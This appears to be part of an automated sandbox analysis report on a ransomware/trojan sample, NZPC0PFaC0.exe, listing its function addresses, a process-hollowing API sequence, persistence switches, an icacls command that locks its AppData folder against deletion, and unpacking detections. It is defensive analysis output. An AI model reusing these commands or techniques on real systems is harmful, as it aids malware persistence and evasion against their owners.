          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_0042F0105_1_0042F010
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_004101605_1_00410160
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_0044237E5_1_0044237E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_004344FF5_1_004344FF
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007CB0008_2_007CB000
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007C30EE8_2_007C30EE
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007D00D08_2_007D00D0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007E18D08_2_007E18D0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007CB0B08_2_007CB0B0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007EF9B08_2_007EF9B0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007EE9A38_2_007EE9A3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007CCA108_2_007CCA10
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007D0B008_2_007D0B00
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007CE6E08_2_007CE6E0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007CC7608_2_007CC760
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_0084B0B09_2_0084B0B0
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_008500D09_2_008500D0
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_008618D09_2_008618D0
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_008430EE9_2_008430EE
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_0084B0009_2_0084B000
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_0086E9A39_2_0086E9A3
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_0086F9B09_2_0086F9B0
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_0084CA109_2_0084CA10
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_0084DBE09_2_0084DBE0
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_00850B009_2_00850B00
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_0084E6E09_2_0084E6E0
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_0084C7609_2_0084C760
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00427D6C10_2_00427D6C
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00419F9010_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040C07010_2_0040C070
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0042E00310_2_0042E003
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040803010_2_00408030
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0041016010_2_00410160
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004C811310_2_004C8113
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004021C010_2_004021C0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0044237E10_2_0044237E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004084C010_2_004084C0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004344FF10_2_004344FF
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0043E5A310_2_0043E5A3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040A66010_2_0040A660
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0041E69010_2_0041E690
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040674010_2_00406740
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040275010_2_00402750
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040A71010_2_0040A710
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040878010_2_00408780
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0042C80410_2_0042C804
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040688010_2_00406880
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004349F310_2_004349F3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004069F310_2_004069F3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00402B8010_2_00402B80
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00406B8010_2_00406B80
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0044ACFF10_2_0044ACFF
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0042CE5110_2_0042CE51
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00434E0B10_2_00434E0B
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00406EE010_2_00406EE0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00420F3010_2_00420F30
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040505710_2_00405057
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0042F01010_2_0042F010
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004070E010_2_004070E0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004391F610_2_004391F6
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040D24010_2_0040D240
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0043524010_2_00435240
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004C934310_2_004C9343
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040544710_2_00405447
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040545710_2_00405457
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0044950610_2_00449506
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0044B5B110_2_0044B5B1
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0043567510_2_00435675
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040968610_2_00409686
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: String function: 00868EC0 appears 38 times
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: String function: 00870160 appears 31 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00868EC0 appears 38 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00428C81 appears 65 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00420EC2 appears 39 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 007F0160 appears 31 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 004547A0 appears 80 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00422587 appears 42 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 007E8EC0 appears 35 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 0042F7C0 appears 102 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 004080B0 appears 42 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 0044F23E appears 92 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00428520 appears 121 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00450870 appears 52 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00454E50 appears 40 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00441A25 appears 51 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 0044F26C appears 35 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: String function: 00870160 appears 31 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00840110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,1_2_00840110
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,8_2_007C0110
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_00840110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,9_2_00840110
          Source: NZPC0PFaC0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: NZPC0PFaC0.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: NZPC0PFaC0.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: NZPC0PFaC0.exeVirustotal: Detection: 35%
          Source: NZPC0PFaC0.exeReversingLabs: Detection: 55%
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeFile read: C:\Users\user\Desktop\NZPC0PFaC0.exeJump to behavior
          Source: NZPC0PFaC0.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe'
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe'
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' Jump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStartJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStartJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\geo[1].jsonJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@18/166@6/2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,5_2_0040D240
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,5_2_00411900
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00412440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,5_2_00412440
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: --Admin10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: IsAutoStart10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: IsTask10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: --ForNetRes10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: IsAutoStart10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: IsTask10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: --Task10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: --AutoStart10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: --Service10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: X1P10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: --Admin10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: runas10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: x2Q10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: x*P10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: C:\Windows\10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: D:\Windows\10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: 7P10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: %username%10_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCommand line argument: F:\10_2_00419F90
          Source: NZPC0PFaC0.exeString found in binary or memory: set-addPolicy
          Source: NZPC0PFaC0.exeString found in binary or memory: id-cmc-addExtensions
          Source: NZPC0PFaC0.exeString found in binary or memory: set-addPolicy
          Source: NZPC0PFaC0.exeString found in binary or memory: id-cmc-addExtensions
          Source: NZPC0PFaC0.exeString found in binary or memory: set-addPolicy
          Source: NZPC0PFaC0.exeString found in binary or memory: id-cmc-addExtensions
          Source: NZPC0PFaC0.exeString found in binary or memory: set-addPolicy
          Source: NZPC0PFaC0.exeString found in binary or memory: id-cmc-addExtensions
          Source: NZPC0PFaC0.exeString found in binary or memory: set-addPolicy
          Source: NZPC0PFaC0.exeString found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: NZPC0PFaC0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: NZPC0PFaC0.exe, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp
          Source: Binary string: C:\lif-ved49-podacarofo-judisovuhola10.pdb source: NZPC0PFaC0.exe
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: NZPC0PFaC0.exe, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp
          Source: Binary string: cC:\lif-ved49-podacarofo-judisovuhola10.pdb source: NZPC0PFaC0.exe

          Data Obfuscation:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeUnpacked PE file: 5.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeUnpacked PE file: 10.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 12.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 13.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 16.2.NZPC0PFaC0.exe.400000.0.unpack
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeUnpacked PE file: 5.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeUnpacked PE file: 10.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 12.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 13.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 16.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_004A6CC8 push eax; ret 1_2_004A6CE6
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_004080F5 push ecx; ret 1_2_00408108
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_004052BE push ecx; ret 1_2_004052D1
